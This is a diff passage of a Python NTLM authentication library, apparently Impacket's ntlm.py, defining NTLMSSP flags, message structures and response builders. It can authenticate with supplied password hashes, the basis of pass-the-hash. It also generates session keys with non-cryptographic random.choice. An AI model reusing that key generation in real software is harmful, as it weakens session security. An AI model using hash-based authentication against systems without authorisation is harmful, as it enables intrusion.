+# https://blogs.msdn.microsoft.com/openspecification/2010/04/19/ntlm-keys-and-sundry-stuff/
+# https://social.msdn.microsoft.com/Forums/c8f488ed-1b96-4e06-bd65-390aa41138d1/msnlmp-msntht-determining-ntlm-v1-or-v2-in-http-authentication?forum=os_specifications
+# So I'm setting a global variable to control this, this can also be set programmatically
+
+USE_NTLMv2 = True # if false will fall back to NTLMv1 (or NTLMv1 with ESS a.k.a NTLM2)
+TEST_CASE = False # Only set to True when running Test Cases
+
+
+def computeResponse(flags, serverChallenge, clientChallenge, serverName, domain, user, password, lmhash='', nthash='',
+                    use_ntlmv2=USE_NTLMv2):
+    if use_ntlmv2:
+        return computeResponseNTLMv2(flags, serverChallenge, clientChallenge, serverName, domain, user, password,
+                                     lmhash, nthash, use_ntlmv2=use_ntlmv2)
+    else:
+        return computeResponseNTLMv1(flags, serverChallenge, clientChallenge, serverName, domain, user, password,
+                                     lmhash, nthash, use_ntlmv2=use_ntlmv2)
+try:
+    from Cryptodome.Cipher import ARC4
+    from Cryptodome.Cipher import DES
+    from Cryptodome.Hash import MD4
+except Exception:
+    LOG.critical("Warning: You don't have any crypto installed. You need pycryptodomex")
+    LOG.critical("See https://pypi.org/project/pycryptodomex/")
+
+NTLM_AUTH_NONE          = 1
+NTLM_AUTH_CONNECT       = 2
+NTLM_AUTH_CALL          = 3
+NTLM_AUTH_PKT           = 4
+NTLM_AUTH_PKT_INTEGRITY = 5
+NTLM_AUTH_PKT_PRIVACY   = 6
+
+# If set, requests 56-bit encryption. If the client sends NTLMSSP_NEGOTIATE_SEAL or NTLMSSP_NEGOTIATE_SIGN
+# with NTLMSSP_NEGOTIATE_56 to the server in the NEGOTIATE_MESSAGE, the server MUST return NTLMSSP_NEGOTIATE_56 to
+# the client in the CHALLENGE_MESSAGE. Otherwise it is ignored. If both NTLMSSP_NEGOTIATE_56 and NTLMSSP_NEGOTIATE_128
+# are requested and supported by the client and server, NTLMSSP_NEGOTIATE_56 and NTLMSSP_NEGOTIATE_128 will both be
+# returned to the client. Clients and servers that set NTLMSSP_NEGOTIATE_SEAL SHOULD set NTLMSSP_NEGOTIATE_56 if it is
+# supported. An alternate name for this field is NTLMSSP_NEGOTIATE_56.
+NTLMSSP_NEGOTIATE_56                       = 0x80000000
+
+# If set, requests an explicit key exchange. This capability SHOULD be used because it improves security for message
+# integrity or confidentiality. See sections 3.2.5.1.2, 3.2.5.2.1, and 3.2.5.2.2 for details. An alternate name for
+# this field is NTLMSSP_NEGOTIATE_KEY_EXCH.
+NTLMSSP_NEGOTIATE_KEY_EXCH                 = 0x40000000
+
+# If set, requests 128-bit session key negotiation. An alternate name for this field is NTLMSSP_NEGOTIATE_128.
+# If the client sends NTLMSSP_NEGOTIATE_128 to the server in the NEGOTIATE_MESSAGE, the server MUST return
+# NTLMSSP_NEGOTIATE_128 to the client in the CHALLENGE_MESSAGE only if the client sets NTLMSSP_NEGOTIATE_SEAL or
+# NTLMSSP_NEGOTIATE_SIGN. Otherwise it is ignored. If both NTLMSSP_NEGOTIATE_56 and NTLMSSP_NEGOTIATE_128 are
+# requested and supported by the client and server, NTLMSSP_NEGOTIATE_56 and NTLMSSP_NEGOTIATE_128 will both be
+# returned to the client. Clients and servers that set NTLMSSP_NEGOTIATE_SEAL SHOULD set NTLMSSP_NEGOTIATE_128 if it
+# is supported. An alternate name for this field is NTLMSSP_NEGOTIATE_128
+NTLMSSP_NEGOTIATE_128                      = 0x20000000
+
+NTLMSSP_RESERVED_1                         = 0x10000000
+NTLMSSP_RESERVED_2                         = 0x08000000
+NTLMSSP_RESERVED_3                         = 0x04000000
+
+# If set, requests the protocol version number. The data corresponding to this flag is provided in the Version field
+# of the NEGOTIATE_MESSAGE, the CHALLENGE_MESSAGE, and the AUTHENTICATE_MESSAGE.<22> An alternate name for this field
+# is NTLMSSP_NEGOTIATE_VERSION
+NTLMSSP_NEGOTIATE_VERSION                  = 0x02000000
+NTLMSSP_RESERVED_4                         = 0x01000000
+
+# If set, indicates that the TargetInfo fields in the CHALLENGE_MESSAGE (section 2.2.1.2) are populated.
+# An alternate name for this field is NTLMSSP_NEGOTIATE_TARGET_INFO.
+NTLMSSP_NEGOTIATE_TARGET_INFO              = 0x00800000
+
+# If set, requests the usage of the LMOWF (section 3.3). An alternate name for this field is
+# NTLMSSP_REQUEST_NON_NT_SESSION_KEY.
+NTLMSSP_REQUEST_NON_NT_SESSION_KEY         = 0x00400000
+NTLMSSP_RESERVED_5                         = 0x00200000
+
+# If set, requests an identify level token. An alternate name for this field is NTLMSSP_NEGOTIATE_IDENTIFY
+NTLMSSP_NEGOTIATE_IDENTIFY                 = 0x00100000
+
+# If set, requests usage of the NTLM v2 session security. NTLM v2 session security is a misnomer because it is not
+# NTLM v2. It is NTLM v1 using the extended session security that is also in NTLM v2. NTLMSSP_NEGOTIATE_LM_KEY and
+# NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY are mutually exclusive. If both NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
+# and NTLMSSP_NEGOTIATE_LM_KEY are requested, NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY alone MUST be returned to the
+# client. NTLM v2 authentication session key generation MUST be supported by both the client and the DC in order to be
+# used, and extended session security signing and sealing requires support from the client and the server in order to
+# be used.<23> An alternate name for this field is NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
+NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY = 0x00080000
+NTLMSSP_NEGOTIATE_NTLM2                    = 0x00080000
+NTLMSSP_TARGET_TYPE_SHARE                  = 0x00040000
+
+# If set, TargetName MUST be a server name. The data corresponding to this flag is provided by the server in the
+# TargetName field of the CHALLENGE_MESSAGE. If this bit is set, then NTLMSSP_TARGET_TYPE_DOMAIN MUST NOT be set.
+# This flag MUST be ignored in the NEGOTIATE_MESSAGE and the AUTHENTICATE_MESSAGE. An alternate name for this field
+# is NTLMSSP_TARGET_TYPE_SERVER
+NTLMSSP_TARGET_TYPE_SERVER                 = 0x00020000
+
+# If set, TargetName MUST be a domain name. The data corresponding to this flag is provided by the server in the
+# TargetName field of the CHALLENGE_MESSAGE. If set, then NTLMSSP_TARGET_TYPE_SERVER MUST NOT be set. This flag MUST
+# be ignored in the NEGOTIATE_MESSAGE and the AUTHENTICATE_MESSAGE. An alternate name for this field is
+# NTLMSSP_TARGET_TYPE_DOMAIN.
+NTLMSSP_TARGET_TYPE_DOMAIN                 = 0x00010000
+
+# If set, requests the presence of a signature block on all messages. NTLMSSP_NEGOTIATE_ALWAYS_SIGN MUST be set in the
+# NEGOTIATE_MESSAGE to the server and the CHALLENGE_MESSAGE to the client. NTLMSSP_NEGOTIATE_ALWAYS_SIGN is overridden
+# by NTLMSSP_NEGOTIATE_SIGN and NTLMSSP_NEGOTIATE_SEAL, if they are supported. An alternate name for this field is
+# NTLMSSP_NEGOTIATE_ALWAYS_SIGN.
+NTLMSSP_NEGOTIATE_ALWAYS_SIGN              = 0x00008000       # forces the other end to sign packets
+NTLMSSP_RESERVED_6                         = 0x00004000
+
+# This flag indicates whether the Workstation field is present. If this flag is not set, the Workstation field MUST be
+# ignored. If this flag is set, the length field of the Workstation field specifies whether the workstation name is
+# nonempty or not.<24> An alternate name for this field is NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED.
+NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED = 0x00002000
+
+# If set, the domain name is provided (section 2.2.1.1).<25> An alternate name for this field is
+# NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED
+NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED      = 0x00001000
+NTLMSSP_RESERVED_7                         = 0x00000800
+
+
+# If set, LM authentication is not allowed and only NT authentication is used.
+NTLMSSP_NEGOTIATE_NT_ONLY                  = 0x00000400
+
+# If set, requests usage of the NTLM v1 session security protocol. NTLMSSP_NEGOTIATE_NTLM MUST be set in the
+# NEGOTIATE_MESSAGE to the server and the CHALLENGE_MESSAGE to the client. An alternate name for this field is
+# NTLMSSP_NEGOTIATE_NTLM
+NTLMSSP_NEGOTIATE_NTLM                     = 0x00000200
+NTLMSSP_RESERVED_8                         = 0x00000100
+
+# If set, requests LAN Manager (LM) session key computation. NTLMSSP_NEGOTIATE_LM_KEY and
+# NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY are mutually exclusive. If both NTLMSSP_NEGOTIATE_LM_KEY and
+# NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY are requested, NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY alone MUST be
+# returned to the client. NTLM v2 authentication session key generation MUST be supported by both the client and the
+# DC in order to be used, and extended session security signing and sealing requires support from the client and the
+# server to be used. An alternate name for this field is NTLMSSP_NEGOTIATE_LM_KEY.
+NTLMSSP_NEGOTIATE_LM_KEY                   = 0x00000080
+
+# If set, requests connectionless authentication. If NTLMSSP_NEGOTIATE_DATAGRAM is set, then NTLMSSP_NEGOTIATE_KEY_EXCH
+# MUST always be set in the AUTHENTICATE_MESSAGE to the server and the CHALLENGE_MESSAGE to the client. An alternate
+# name for this field is NTLMSSP_NEGOTIATE_DATAGRAM.
+NTLMSSP_NEGOTIATE_DATAGRAM                 = 0x00000040
+
+# If set, requests session key negotiation for message confidentiality. If the client sends NTLMSSP_NEGOTIATE_SEAL to
+# the server in the NEGOTIATE_MESSAGE, the server MUST return NTLMSSP_NEGOTIATE_SEAL to the client in the
+# CHALLENGE_MESSAGE. Clients and servers that set NTLMSSP_NEGOTIATE_SEAL SHOULD always set NTLMSSP_NEGOTIATE_56 and
+# NTLMSSP_NEGOTIATE_128, if they are supported. An alternate name for this field is NTLMSSP_NEGOTIATE_SEAL.
+NTLMSSP_NEGOTIATE_SEAL                     = 0x00000020
+
+# If set, requests session key negotiation for message signatures. If the client sends NTLMSSP_NEGOTIATE_SIGN to the
+# server in the NEGOTIATE_MESSAGE, the server MUST return NTLMSSP_NEGOTIATE_SIGN to the client in the CHALLENGE_MESSAGE.
+# An alternate name for this field is NTLMSSP_NEGOTIATE_SIGN.
+NTLMSSP_NEGOTIATE_SIGN                     = 0x00000010       # means packet is signed, if verifier is wrong it fails
+NTLMSSP_RESERVED_9                         = 0x00000008
+
+# If set, a TargetName field of the CHALLENGE_MESSAGE (section 2.2.1.2) MUST be supplied. An alternate name for this
+# field is NTLMSSP_REQUEST_TARGET.
+NTLMSSP_REQUEST_TARGET                     = 0x00000004
+
+# If set, requests OEM character set encoding. An alternate name for this field is NTLM_NEGOTIATE_OEM. See bit A for
+# details.
+NTLM_NEGOTIATE_OEM                         = 0x00000002
+
+# If set, requests Unicode character set encoding. An alternate name for this field is NTLMSSP_NEGOTIATE_UNICODE.
+NTLMSSP_NEGOTIATE_UNICODE                  = 0x00000001
+
+# AV_PAIR constants
+NTLMSSP_AV_EOL              = 0x00
+NTLMSSP_AV_HOSTNAME         = 0x01
+NTLMSSP_AV_DOMAINNAME       = 0x02
+NTLMSSP_AV_DNS_HOSTNAME     = 0x03
+NTLMSSP_AV_DNS_DOMAINNAME   = 0x04
+NTLMSSP_AV_DNS_TREENAME     = 0x05
+NTLMSSP_AV_FLAGS            = 0x06
+NTLMSSP_AV_TIME             = 0x07
+NTLMSSP_AV_RESTRICTIONS     = 0x08
+NTLMSSP_AV_TARGET_NAME      = 0x09
+NTLMSSP_AV_CHANNEL_BINDINGS = 0x0a
+
+class AV_PAIRS:
+    def __init__(self, data = None):
+        self.fields = {}
+        if data is not None:
+            self.fromString(data)
+
+    def __setitem__(self,key,value):
+        self.fields[key] = (len(value),value)
+
+    def __getitem__(self, key):
+        if key in self.fields:
+           return self.fields[key]
+        return None
+
+    def __delitem__(self, key):
+        del self.fields[key]
+
+    def __len__(self):
+        return len(self.getData())
+
+    def __str__(self):
+        return len(self.getData())
+
+    def fromString(self, data):
+        tInfo = data
+        fType = 0xff
+        while fType is not NTLMSSP_AV_EOL:
+            fType = struct.unpack('<H',tInfo[:struct.calcsize('<H')])[0]
+            tInfo = tInfo[struct.calcsize('<H'):]
+            length = struct.unpack('<H',tInfo[:struct.calcsize('<H')])[0]
+            tInfo = tInfo[struct.calcsize('<H'):]
+            content = tInfo[:length]
+            self.fields[fType]=(length,content)
+            tInfo = tInfo[length:]
+
+    def dump(self):
+        for i in list(self.fields.keys()):
+            print("%s: {%r}" % (i,self[i]))
+
+    def getData(self):
+        if NTLMSSP_AV_EOL in self.fields:
+            del self.fields[NTLMSSP_AV_EOL]
+        ans = b''
+        for i in list(self.fields.keys()):
+            ans+= struct.pack('<HH', i, self[i][0])
+            ans+= self[i][1]
+ 
+        # end with a NTLMSSP_AV_EOL
+        ans += struct.pack('<HH', NTLMSSP_AV_EOL, 0)
+
+        return ans
+
+# [MS-NLMP] 2.2.2.10 VERSION
+# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/b1a6ceb2-f8ad-462b-b5af-f18527c48175
+class VERSION(Structure):
+    NTLMSSP_REVISION_W2K3 = 0x0F
+
+    structure = (
+        ('ProductMajorVersion', '<B=0'),
+        ('ProductMinorVersion', '<B=0'),
+        ('ProductBuild', '<H=0'),
+        ('Reserved', '3s=""'),
+        ('NTLMRevisionCurrent', '<B=self.NTLMSSP_REVISION_W2K3'),
+    )
+
+class NTLMAuthNegotiate(Structure):
+
+    structure = (
+        ('','"NTLMSSP\x00'),
+        ('message_type','<L=1'),
+        ('flags','<L'),
+        ('domain_len','<H-domain_name'),
+        ('domain_max_len','<H-domain_name'),
+        ('domain_offset','<L=0'),
+        ('host_len','<H-host_name'),
+        ('host_maxlen','<H-host_name'),
+        ('host_offset','<L=0'),
+        ('os_version',':'),
+        ('host_name',':'),
+        ('domain_name',':'))
+                                                                                
+    def __init__(self):
+        Structure.__init__(self)
+        self['flags']= (
+               NTLMSSP_NEGOTIATE_128     |
+               NTLMSSP_NEGOTIATE_KEY_EXCH|
+               # NTLMSSP_LM_KEY      |
+               NTLMSSP_NEGOTIATE_NTLM    |
+               NTLMSSP_NEGOTIATE_UNICODE     |
+               # NTLMSSP_ALWAYS_SIGN |
+               NTLMSSP_NEGOTIATE_SIGN        |
+               NTLMSSP_NEGOTIATE_SEAL        |
+               # NTLMSSP_TARGET      |
+               0)
+        self['host_name']=''
+        self['domain_name']=''
+        self['os_version']=''
+        self._workstation = ''
+
+    def setWorkstation(self, workstation):
+        self._workstation = workstation
+
+    def getWorkstation(self):
+        return self._workstation
+
+    def __hasNegotiateVersion(self):
+        return (self['flags'] & NTLMSSP_NEGOTIATE_VERSION) == NTLMSSP_NEGOTIATE_VERSION
+
+    def getData(self):
+        if len(self.fields['host_name']) > 0:
+            self['flags'] |= NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED
+        if len(self.fields['domain_name']) > 0:
+            self['flags'] |= NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED
+        version_len = len(self.fields['os_version'])
+        if version_len > 0:
+            self['flags'] |= NTLMSSP_NEGOTIATE_VERSION
+        elif self.__hasNegotiateVersion():
+            raise Exception('Must provide the os_version field if the NTLMSSP_NEGOTIATE_VERSION flag is set')
+        if (self['flags'] & NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED) == NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED:
+            self['host_offset']=32 + version_len
+        if (self['flags'] & NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED) == NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED:
+            self['domain_offset']=32+len(self['host_name']) + version_len
+        return Structure.getData(self)
+
+    def fromString(self,data):
+        Structure.fromString(self,data)
+
+        domain_offset = self['domain_offset']
+        domain_end    = self['domain_len'] + domain_offset
+        self['domain_name'] = data[ domain_offset : domain_end ]
+
+        host_offset = self['host_offset']
+        host_end    = self['host_len'] + host_offset
+        self['host_name'] = data[ host_offset : host_end ]
+
+        if len(data) >= 36 and self.__hasNegotiateVersion():
+            self['os_version'] = VERSION(data[32:])
+        else:
+            self['os_version'] = ''
+
+class NTLMAuthChallenge(Structure):
+
+    structure = (
+        ('','"NTLMSSP\x00'),
+        ('message_type','<L=2'),
+        ('domain_len','<H-domain_name'),
+        ('domain_max_len','<H-domain_name'),
+        ('domain_offset','<L=40'),
+        ('flags','<L=0'),
+        ('challenge','8s'),
+        ('reserved','8s=""'),
+        ('TargetInfoFields_len','<H-TargetInfoFields'),
+        ('TargetInfoFields_max_len','<H-TargetInfoFields'),
+        ('TargetInfoFields_offset','<L'),
+        ('VersionLen','_-Version','self.checkVersion(self["flags"])'), 
+        ('Version',':'),
+        ('domain_name',':'),
+        ('TargetInfoFields',':'))
+
+    @staticmethod
+    def checkVersion(flags):
+        if flags is not None:
+           if flags & NTLMSSP_NEGOTIATE_VERSION == 0:
+              return 0
+        return 8
+
+    def getData(self):
+        if self['TargetInfoFields'] is not None and type(self['TargetInfoFields']) is not bytes:
+            raw_av_fields = self['TargetInfoFields'].getData()
+            self['TargetInfoFields'] = raw_av_fields
+        return Structure.getData(self)
+
+    def fromString(self,data):
+        Structure.fromString(self,data)
+        self['domain_name'] = data[self['domain_offset']:][:self['domain_len']]
+        self['TargetInfoFields'] = data[self['TargetInfoFields_offset']:][:self['TargetInfoFields_len']]
+        return self
+        
+class NTLMAuthChallengeResponse(Structure):
+
+    structure = (
+        ('','"NTLMSSP\x00'),
+        ('message_type','<L=3'),
+        ('lanman_len','<H-lanman'),
+        ('lanman_max_len','<H-lanman'),
+        ('lanman_offset','<L'),
+        ('ntlm_len','<H-ntlm'),
+        ('ntlm_max_len','<H-ntlm'),
+        ('ntlm_offset','<L'),
+        ('domain_len','<H-domain_name'),
+        ('domain_max_len','<H-domain_name'),
+        ('domain_offset','<L'),
+        ('user_len','<H-user_name'),
+        ('user_max_len','<H-user_name'),
+        ('user_offset','<L'),
+        ('host_len','<H-host_name'),
+        ('host_max_len','<H-host_name'),
+        ('host_offset','<L'),
+        ('session_key_len','<H-session_key'),
+        ('session_key_max_len','<H-session_key'),
+        ('session_key_offset','<L'),
+        ('flags','<L'),
+        ('VersionLen','_-Version','self.checkVersion(self["flags"])'), 
+        ('Version',':=""'),
+        ('MICLen','_-MIC','self.checkMIC(self["flags"])'),
+        ('MIC',':=""'),
+        ('domain_name',':'),
+        ('user_name',':'),
+        ('host_name',':'),
+        ('lanman',':'),
+        ('ntlm',':'),
+        ('session_key',':'))
+
+    def __init__(self, username = '', password = '', challenge = '', lmhash = '', nthash = '', flags = 0):
+        Structure.__init__(self)
+        self['session_key']=''
+        self['user_name']=username.encode('utf-16le')
+        self['domain_name']='' #"CLON".encode('utf-16le')
+        self['host_name']='' #"BETS".encode('utf-16le')
+        self['flags'] = (   #authResp['flags']
+            # we think (beto & gera) that his flags force a memory conten leakage when a windows 2000 answers using
+            # uninitializaed verifiers
+           NTLMSSP_NEGOTIATE_128     |
+           NTLMSSP_NEGOTIATE_KEY_EXCH|
+           # NTLMSSP_LM_KEY      |
+           NTLMSSP_NEGOTIATE_NTLM    |
+           NTLMSSP_NEGOTIATE_UNICODE     |
+           # NTLMSSP_ALWAYS_SIGN |
+           NTLMSSP_NEGOTIATE_SIGN        |
+           NTLMSSP_NEGOTIATE_SEAL        |
+           # NTLMSSP_TARGET      |
+           0)
+        # Here we do the stuff
+        if username and ( lmhash != '' or nthash != ''):            
+            self['lanman'] = get_ntlmv1_response(lmhash, challenge)
+            self['ntlm'] = get_ntlmv1_response(nthash, challenge)
+        elif username and password:
+            lmhash = compute_lmhash(password)
+            nthash = compute_nthash(password)
+            self['lanman']=get_ntlmv1_response(lmhash, challenge)
+            self['ntlm']=get_ntlmv1_response(nthash, challenge)    # This is not used for LM_KEY nor NTLM_KEY
+        else:
+            self['lanman'] = ''
+            self['ntlm'] = ''
+            if not self['host_name']:
+                self['host_name'] = 'NULL'.encode('utf-16le')      # for NULL session there must be a hostname
+
+    @staticmethod
+    def checkVersion(flags):
+        if flags is not None:
+           if flags & NTLMSSP_NEGOTIATE_VERSION == 0:
+              return 0
+        return 8
+
+    @staticmethod
+    def checkMIC(flags):
+        # TODO: Find a proper way to check the MIC is in there
+        if flags is not None:
+           if flags & NTLMSSP_NEGOTIATE_VERSION == 0:
+              return 0
+        return 16
+                                                                                
+    def getData(self):
+        self['domain_offset']=64+self.checkMIC(self["flags"])+self.checkVersion(self["flags"])
+        self['user_offset']=64+self.checkMIC(self["flags"])+self.checkVersion(self["flags"])+len(self['domain_name'])
+        self['host_offset']=self['user_offset']+len(self['user_name'])
+        self['lanman_offset']=self['host_offset']+len(self['host_name'])
+        self['ntlm_offset']=self['lanman_offset']+len(self['lanman'])
+        self['session_key_offset']=self['ntlm_offset']+len(self['ntlm'])
+        return Structure.getData(self)
+
+    def fromString(self,data):
+        Structure.fromString(self,data)
+        # [MS-NLMP] page 27
+        # Payload data can be present in any order within the Payload field, 
+        # with variable-length padding before or after the data
+
+        domain_offset = self['domain_offset']
+        domain_end = self['domain_len'] + domain_offset
+        self['domain_name'] = data[ domain_offset : domain_end ]
+
+        host_offset = self['host_offset']
+        host_end    = self['host_len'] + host_offset
+        self['host_name'] = data[ host_offset: host_end ]
+
+        user_offset = self['user_offset']
+        user_end    = self['user_len'] + user_offset
+        self['user_name'] = data[ user_offset: user_end ]
+
+        ntlm_offset = self['ntlm_offset'] 
+        ntlm_end    = self['ntlm_len'] + ntlm_offset 
+        self['ntlm'] = data[ ntlm_offset : ntlm_end ]
+
+        lanman_offset = self['lanman_offset'] 
+        lanman_end    = self['lanman_len'] + lanman_offset
+        self['lanman'] = data[ lanman_offset : lanman_end]
+
+class ImpacketStructure(Structure):
+    def set_parent(self, other):
+        self.parent = other
+
+    def get_packet(self):
+        return str(self)
+
+    def get_size(self):
+        return len(self)
+
+class ExtendedOrNotMessageSignature(Structure):
+    def __init__(self, flags = 0, **kargs):
+        if flags & NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY:
+            self.structure = self.extendedMessageSignature
+        else:
+            self.structure = self.MessageSignature
+        return Structure.__init__(self, **kargs)
+
+class NTLMMessageSignature(ExtendedOrNotMessageSignature):
+      extendedMessageSignature = (
+          ('Version','<L=1'),
+          ('Checksum','<q'),
+          ('SeqNum','<I'),
+      )
+
+      MessageSignature = (
+          ('Version','<L=1'),
+          ('RandomPad','<I=0'),
+          ('Checksum','<I'),
+          ('SeqNum','<I'),
+      )
+
+KNOWN_DES_INPUT = b"KGS!@#$%"
+
+def __expand_DES_key(key):
+    # Expand the key from a 7-byte password key into a 8-byte DES key
+    if not isinstance(key, bytes):
+        key = bytes(key)
+    key  = bytearray(key[:7]).ljust(7, b'\x00')
+    s = bytearray()
+    s.append(((key[0] >> 1) & 0x7f) << 1)
+    s.append(((key[0] & 0x01) << 6 | ((key[1] >> 2) & 0x3f)) << 1)
+    s.append(((key[1] & 0x03) << 5 | ((key[2] >> 3) & 0x1f)) << 1)
+    s.append(((key[2] & 0x07) << 4 | ((key[3] >> 4) & 0x0f)) << 1)
+    s.append(((key[3] & 0x0f) << 3 | ((key[4] >> 5) & 0x07)) << 1)
+    s.append(((key[4] & 0x1f) << 2 | ((key[5] >> 6) & 0x03)) << 1)
+    s.append(((key[5] & 0x3f) << 1 | ((key[6] >> 7) & 0x01)) << 1)
+    s.append((key[6] & 0x7f) << 1)
+    return bytes(s)
+
+def __DES_block(key, msg):
+    cipher = DES.new(__expand_DES_key(key),DES.MODE_ECB)
+    return cipher.encrypt(msg)
+
+def ntlmssp_DES_encrypt(key, challenge):
+    answer  = __DES_block(key[:7], challenge)
+    answer += __DES_block(key[7:14], challenge)
+    answer += __DES_block(key[14:], challenge)
+    return answer
+
+# High level functions to use NTLMSSP
+
+def getNTLMSSPType1(workstation='', domain='', signingRequired = False, use_ntlmv2 = USE_NTLMv2):
+    # Let's do some encoding checks before moving on. Kind of dirty, but found effective when dealing with
+    # international characters.
+    import sys
+    encoding = sys.getfilesystemencoding()
+    if encoding is not None:
+        try:
+            workstation.encode('utf-16le')
+        except:
+            workstation = workstation.decode(encoding)
+        try:
+            domain.encode('utf-16le')
+        except:
+            domain = domain.decode(encoding)
+
+    # Let's prepare a Type 1 NTLMSSP Message
+    auth = NTLMAuthNegotiate()
+    auth['flags']=0
+    if signingRequired:
+       auth['flags'] = NTLMSSP_NEGOTIATE_KEY_EXCH | NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_ALWAYS_SIGN | \
+                       NTLMSSP_NEGOTIATE_SEAL
+    if use_ntlmv2:
+       auth['flags'] |= NTLMSSP_NEGOTIATE_TARGET_INFO
+    auth['flags'] |= NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY | NTLMSSP_NEGOTIATE_UNICODE | \
+                     NTLMSSP_REQUEST_TARGET |  NTLMSSP_NEGOTIATE_128 | NTLMSSP_NEGOTIATE_56
+
+    # We're not adding workstation / domain fields this time. Normally Windows clients don't add such information but,
+    # we will save the workstation name to be used later.
+    auth.setWorkstation(workstation)
+
+    return auth
+
+def getNTLMSSPType3(type1, type2, user, password, domain, lmhash = '', nthash = '', use_ntlmv2 = USE_NTLMv2):
+
+    # Safety check in case somebody sent password = None.. That's not allowed. Setting it to '' and hope for the best.
+    if password is None:
+        password = ''
+
+    # Let's do some encoding checks before moving on. Kind of dirty, but found effective when dealing with
+    # international characters.
+    import sys
+    encoding = sys.getfilesystemencoding()
+    if encoding is not None:
+        try:
+            user.encode('utf-16le')
+        except:
+            user = user.decode(encoding)
+        try:
+            password.encode('utf-16le')
+        except:
+            password = password.decode(encoding)
+        try:
+            domain.encode('utf-16le')
+        except:
+            domain = user.decode(encoding)
+
+    ntlmChallenge = NTLMAuthChallenge(type2)
+
+    # Let's start with the original flags sent in the type1 message
+    responseFlags = type1['flags']
+
+    # Token received and parsed. Depending on the authentication 
+    # method we will create a valid ChallengeResponse
+    ntlmChallengeResponse = NTLMAuthChallengeResponse(user, password, ntlmChallenge['challenge'])
+
+    clientChallenge = b("".join([random.choice(string.digits+string.ascii_letters) for _ in range(8)]))
+
+    serverName = ntlmChallenge['TargetInfoFields']
+
+    ntResponse, lmResponse, sessionBaseKey = computeResponse(ntlmChallenge['flags'], ntlmChallenge['challenge'],
+                                                             clientChallenge, serverName, domain, user, password,
+                                                             lmhash, nthash, use_ntlmv2)
+
+    # Let's check the return flags
+    if (ntlmChallenge['flags'] & NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY) == 0:
+        # No extended session security, taking it out
+        responseFlags &= 0xffffffff ^ NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
+    if (ntlmChallenge['flags'] & NTLMSSP_NEGOTIATE_128 ) == 0:
+        # No support for 128 key len, taking it out
+        responseFlags &= 0xffffffff ^ NTLMSSP_NEGOTIATE_128
+    if (ntlmChallenge['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH) == 0:
+        # No key exchange supported, taking it out
+        responseFlags &= 0xffffffff ^ NTLMSSP_NEGOTIATE_KEY_EXCH
+    if (ntlmChallenge['flags'] & NTLMSSP_NEGOTIATE_SEAL) == 0:
+        # No sign available, taking it out
+        responseFlags &= 0xffffffff ^ NTLMSSP_NEGOTIATE_SEAL
+    if (ntlmChallenge['flags'] & NTLMSSP_NEGOTIATE_SIGN) == 0:
+        # No sign available, taking it out
+        responseFlags &= 0xffffffff ^ NTLMSSP_NEGOTIATE_SIGN
+    if (ntlmChallenge['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN) == 0:
+        # No sign available, taking it out
+        responseFlags &= 0xffffffff ^ NTLMSSP_NEGOTIATE_ALWAYS_SIGN
+
+    keyExchangeKey = KXKEY(ntlmChallenge['flags'], sessionBaseKey, lmResponse, ntlmChallenge['challenge'], password,
+                           lmhash, nthash, use_ntlmv2)
+
+    # Special case for anonymous login
+    if user == '' and password == '' and lmhash == '' and nthash == '':
+      keyExchangeKey = b'\x00'*16
+
+    # If we set up key exchange, let's fill the right variables
+    if ntlmChallenge['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH:
+       # not exactly what I call random tho :\
+       # exportedSessionKey = this is the key we should use to sign
+       exportedSessionKey = b("".join([random.choice(string.digits+string.ascii_letters) for _ in range(16)]))
+       #exportedSessionKey = "A"*16
+       #print "keyExchangeKey %r" % keyExchangeKey
+       # Let's generate the right session key based on the challenge flags
+       #if responseFlags & NTLMSSP_NTLM2_KEY:
+           # Extended session security enabled
+       #    if responseFlags & NTLMSSP_KEY_128:
+               # Full key
+       #        exportedSessionKey = exportedSessionKey
+       #    elif responseFlags & NTLMSSP_KEY_56:
+               # Only 56-bit key
+       #        exportedSessionKey = exportedSessionKey[:7]
+       #    else:
+       #        exportedSessionKey = exportedSessionKey[:5]
+       #elif responseFlags & NTLMSSP_KEY_56:
+           # No extended session security, just 56 bits key
+       #    exportedSessionKey = exportedSessionKey[:7] + '\xa0'
+       #else:
+       #    exportedSessionKey = exportedSessionKey[:5] + '\xe5\x38\xb0'
+
+       encryptedRandomSessionKey = generateEncryptedSessionKey(keyExchangeKey, exportedSessionKey)
+    else:
+       encryptedRandomSessionKey = None
+       # [MS-NLMP] page 46
+       exportedSessionKey        = keyExchangeKey
+
+    ntlmChallengeResponse['flags'] = responseFlags
+    ntlmChallengeResponse['domain_name'] = domain.encode('utf-16le')
+    ntlmChallengeResponse['host_name'] = type1.getWorkstation().encode('utf-16le')
+    if lmResponse == '':
+        ntlmChallengeResponse['lanman'] = b'\x00'
+    else:
+        ntlmChallengeResponse['lanman'] = lmResponse
+    ntlmChallengeResponse['ntlm'] = ntResponse
+    if encryptedRandomSessionKey is not None: 
